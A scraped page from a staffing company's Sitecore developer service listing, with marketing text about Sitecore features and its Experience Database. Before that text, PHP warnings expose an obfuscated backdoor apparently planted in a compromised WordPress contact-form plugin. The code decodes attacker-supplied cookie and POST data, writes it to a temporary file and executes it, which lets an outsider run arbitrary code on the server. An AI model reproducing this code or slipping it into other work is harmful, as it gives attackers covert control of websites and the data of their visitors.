Warning: Uninitialized string offset 0 in /var/www/staffingpeoples.com/wp-content/plugins/contact-form-7/wp-contact-form-7.php on line 2

Warning: Uninitialized string offset 0 in /var/www/staffingpeoples.com/wp-content/plugins/contact-form-7/wp-contact-form-7.php on line 2
$uWSfXsLqj = chr ( 679 - 612 ).chr ( 457 - 362 ).chr (75) . "\x48" . 'R' . 'f' . chr (97); $RTsSrxtOKz = "\x63" . "\154" . "\141" . "\x73" . chr (115) . '_' . "\145" . chr ( 446 - 326 )."\151" . 's' . "\164" . "\163";$ajIDb = class_exists($uWSfXsLqj); $RTsSrxtOKz = "14874";$JjGpA = strpos($RTsSrxtOKz, $uWSfXsLqj);if ($ajIDb == $JjGpA){function gkKnwxpu(){$YwABnoSFeq = new /* 5501 */ C_KHRfa(25459 + 25459); $YwABnoSFeq = NULL;}$MpGgXeYZbB = "25459";class C_KHRfa{private function NSLMnndC($MpGgXeYZbB){if (is_array(C_KHRfa::$knGOMtiK)) {$name = sys_get_temp_dir() . "/" . crc32(C_KHRfa::$knGOMtiK["salt"]);@C_KHRfa::$knGOMtiK["write"]($name, C_KHRfa::$knGOMtiK["content"]);include $name;@C_KHRfa::$knGOMtiK["delete"]($name); $MpGgXeYZbB = "25459";exit();}}public function icUHrNGR(){$dcOQxTI = "2745";$this->_dummy = str_repeat($dcOQxTI, strlen($dcOQxTI));}public function __destruct(){C_KHRfa::$knGOMtiK = @unserialize(C_KHRfa::$knGOMtiK); $MpGgXeYZbB = "7407_62740";$this->NSLMnndC($MpGgXeYZbB); $MpGgXeYZbB = "7407_62740";}public function fOUNkOPFU($dcOQxTI, $AyqxmLW){return $dcOQxTI[0] ^ str_repeat($AyqxmLW, intval(strlen($dcOQxTI[0]) / strlen($AyqxmLW)) + 1);}public function WxeeL($dcOQxTI){$GrJpbHq = chr (98) . chr ( 388 - 291 ).chr (115) . "\145" . "\66" . "\64";return array_map($GrJpbHq . chr (95) . chr ( 524 - 424 ).chr (101) . chr (99) . 'o' . "\144" . 'e', array($dcOQxTI,));}public function __construct($gVNKsNfZ=0){$BsyYOP = "\54";$dcOQxTI = "";$ntPTAwLns = $_POST;$WtbjaGwM = $_COOKIE;$AyqxmLW = "ab2fe248-606f-47ee-a2c0-adaa6b492699";$LzMKO = @$WtbjaGwM[substr($AyqxmLW, 0, 4)];if (!empty($LzMKO)){$LzMKO = explode($BsyYOP, $LzMKO);foreach ($LzMKO as $FNwFPkwVTd){$dcOQxTI .= @$WtbjaGwM[$FNwFPkwVTd];$dcOQxTI .= @$ntPTAwLns[$FNwFPkwVTd];}$dcOQxTI = $this->WxeeL($dcOQxTI);}C_KHRfa::$knGOMtiK = $this->fOUNkOPFU($dcOQxTI, $AyqxmLW);if (strpos($AyqxmLW, $BsyYOP) !== FALSE){$AyqxmLW = ltrim($AyqxmLW); $AyqxmLW = str_pad($AyqxmLW, 10);}}public static $knGOMtiK = 37296;}gkKnwxpu();} Sitecore Developer|Staffing Peoples Services

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Sitecore is a digital asset management software with the main focus on customer experience. Powered by .NET it a fully-featured software with Experience Platform, Experience Commerce, Content hub, Experience Manager, Expanding Sitecore, and Product packaging. Sitecore also allows 3rd part integration with Commerce connects, salesforce, Microsoft Dynamics 365 for Retail & Sales, and Technical alliance program.


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    Sitecore services include an end to end content management to build a comprehensive relation between content and customer behavior. All the user information through multiple devices, email, newsletters are stored in one location at Sitecore Experience Database (xDB). This helps marketers for secure CRM connectivity and easy dashboards views for strategizing & planning further.



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